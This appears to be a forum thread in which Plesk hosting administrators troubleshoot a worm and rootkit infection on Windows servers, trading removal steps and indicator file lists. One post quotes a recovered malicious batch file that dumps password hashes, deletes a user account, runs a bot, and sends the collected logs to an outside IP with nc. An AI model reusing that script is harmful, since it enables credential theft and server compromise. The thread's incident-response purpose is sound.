plesk login page problem

[ecohosting]

My McAfee scan found this in the IE temp folder. I never use IE, only Firefox.

C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP2FOLA3\_iNDEX[1].exe\PACK.EXE\NW.DLL ... Found trojan or variant Generic.dp !!!

Like everyone my sites are all down. I did find and delete the a.exe but the rdriv.sys is still popping up after being deleted. Has anyone identified the process restoring this and the registry keys associated with it?

 

[jimt@]

Some more info for everyone...

We have been able to get rdriv.sys removed and it does not reappear. Disabling all MailEnable services seems to prevent rdriv.sys from coming back after a deletion and reboot.

However, in that state the machine will reboot itself after you login to the console or after a short uptime.

This is so frustrating...

Jim
Bocacom

 

[umangbagla]

update from swsoft

i think plesk officials needs to seriously look into this problem as i am sure many people would have been affected with this problem and will come to this forum while searching for help. swsoft people please hear us and come with a solution. atleast respond saying that you will come with a path or update at a particular time so that we can wait and inform our customers who are going mad taken our hosting service.

i am sure all people suffering from this problem like me will back me for plesk to come with a time frame for a solution soon.

 

[umangbagla]

any updates

has any other user facing this problem able to get out of the problem. please advise so that we can also do the same settings and have our websites live down since so many hours. god knows when swsoft team will respond.

 

[umangbagla]

Message for TarkanVeKurdu

did you find any solution working with your servers.

 

[TarkanVeKurdu]

Ok I am near solution. Will post you . Stay tuned

 

[djape]

What to say...
swsoft will carry my soul on their conscience...
I had a lot of unpleasant calls from customers throughout the day...
Not sure that any fix will help me, as I tried a lot of fixes regarding this issue and I'm not sure if I spoiled something else on the way. I blame swsoft for not responding for hours that this is global problem.
If I new that I wouldn't TOUCH anything!!!

 

[TarkanVeKurdu]

I am very sorry I tought I solved it but seems its not. psacln user is dissappearing from local group policy .

Still the same problem and got exhausted.

 

[umangbagla]

swsoft update required

i feel the only solution to this problem is that this is some bug which has affected many plesk installations and slowly people are coming up here and posting their problems and i am sure in some time from now there will be many people coming here to share the same issue.

until and unless plesk updates the exact solution its not advisable according to me to fix any setting. the setting given was for plesk 8.1 and is not sure if it applies to us on 7.6.1

 

[ecohosting]

Narrowing in.....

I've identified several elements that I think are at the cause of this.

Here is a bat file that I think installed most of it:

cd %WINDIR%\system32
gethashes.exe $Local>>Status.log
pack.exe
net user aspnet /delete /y>>status.log
bw.exe>>status.log
net localgroup Administrators >>status.log
del hash.bat
psinfo -d >>status.log
ipconfig/all>>status.log
bot.exe
type status.log|nc 209.196.36.78 53
start cmd /c del status.log
start cmd /c del pack.exe
start cmd /c del unrar.exe
start cmd /c del fix.bat
start cmd /c del _iNDEX.exe

Some of these files were in my IE temporay internet files I mentioned before.

Some of the key files to remove are:

c:\windows\system32\clipsvr.exe (not clipsrv.exe!!)
c:\windows\system32\rdriv.sys
c:\windows\system32\a.exe
c:\windows\config\config.exe

After removing these I can then add the psacln user to the User Rights Assignment in Local Policies mentioned earlier in the post (if you are lost please read the post in its entirety to catch up).

So after all this my sitea rea working but I am afraid to reboot. I've searched for and removed all Registry entries for the above files except one: clipsvr.exe. I am unable to remove it. I get this from regedit: cannot edit imagepath.

Does anyone know how I can modify that entry in the registry?

I hope this helps som eof you to get your sites back up.

Good luck! and no thanks to the people at SWSoft. Anyone want to buy a Plesk license? I am dumping this piece of S**T software and the crappy support they offer. Nothing but headaches since I got it!!

 

[mattd2173]

@ecohosting

Were you able to get subdomains back online, such as webmail.domain.com? websrvmng doesn't seem to like those.

 

[SteveDude]

Last Week

I had a problem last week with a virus infecting Plesk, but Dr.Web caught it after a scan on the server and elminated it (I thought). Starting to think that the problem is related.

 

[ecohosting]

Unfortunately I can't tell you as I don't have any subdomains setup on this server. I bought Plesk to simply host my ASP and .NET customers (about 25 domains). We're a cPanel shop. There is no DNS, no email, no databases running on this server. I use it strictly for IIS and AWStats and it still doesn't run reliably!

 

[SteveDude]

Originally posted by ecohosting
Unfortunately I can't tell you as I don't have any subdomains setup on this server. I bought Plesk to simply host my ASP and .NET customers (about 25 domains). We're a cPanel shop. There is no DNS, no email, no databases running on this server. I use it strictly for IIS and AWStats and it still doesn't run reliably!

Do you have the mail server disabled? I heard that doing so will prevent the threat from reoccuring.

 

[mattd2173]

SteveDude: I have my mail server (MailEnable Enterprise 2.35) enabled, and my sites are working now, per the instructions I posted earlier in the thread. However, all of my subdomains are still showing the same problem.

 

[ecohosting]

update on the file clipsvr.exe...

Just found this about clipsvr.exe. You should search for and remove the follwing files if you find them. Here is where I got it: http://research.sunbelt-software.com/threatdisplay.aspx?name=Backdoor.SdBot.aad&threatid=42825

Alias Backdoor.Win32.SdBot.aad, Backdoor.SdBot.aad
File Traces
%system%\ apsvc.exe
%SYSTEM%\ scvhost.exe
%system%\ shellsw.exe
%windows%\ clipsvr.exe
%WINDOWS%\ msvc.exe
%WINDOWS%\ spoolsvr.exe
%WINDOWS%\ wmiapsrv.exe
6f0272b1595ce1ebcb1b704f8a439e47.exe
a26p.exe
b22p.exe
er2p.exe
loader.exe
myspace_11.com
rp5.exe
svslogon.exe
svsnet.exe
zn9p.exe

 

[ecohosting]

Originally posted by SteveDude
Do you have the mail server disabled? I heard that doing so will prevent the threat from reoccuring.

Yes I did have it disabled. This is really curious as some people are saying it is MailEnable related, some are saying it is an actual Plesk update, I found the trojan install files in my IE temp folder (I never use IE).

In the end I found the files manually, removed them and cleaned out the registry as musch as I can. Now I have to reboot and cross my fingers!! Pray for me...

 

[smerkel]

Some Thoughts

Greetings:

I just thought I would post in some things we are seeing. It does appear to be related to the MailEnable issue that SWSoft has warned about. Additionally, the worm appears to be spreading autonomously (like most worms do).

What we are seeing is infected machines starting to make a large number of connections to other machines, starting on the same subnet of IP space, to port 110. Additionally, we are seeing hung connections from infected machines to newly infected machines on port 110.

Lastly, the best information we have on hand at the moment indicates that the rootkit installed is Trojan.NTRootKit.61. We have not tested a cleaning protocol as of yet but will do so once we identify a process that works well.

Regardless, if you manage to clean your installation, I recommend upgrading ME as directed by SWSoft, or add ACL's to the environment to block inbound port 110 traffic until you can get it patched.

Good luck, and we'll post anything we learn along the way.

Regards,

Steve

 

[supra2800@]

Re: Some Thoughts

Originally posted by smerkel
Greetings:

I just thought I would post in some things we are seeing. It does appear to be related to the MailEnable issue that SWSoft has warned about.

Where did we get this warning?
I don't believe I got any such message. Do you have a link?

 

[smerkel]

It was a partner email that was sent out. Additionally, several vulnerability databases sent notifications with regards to the Mail Enable issue.

http://secunia.com/advisories/23127/

Regards,

Steve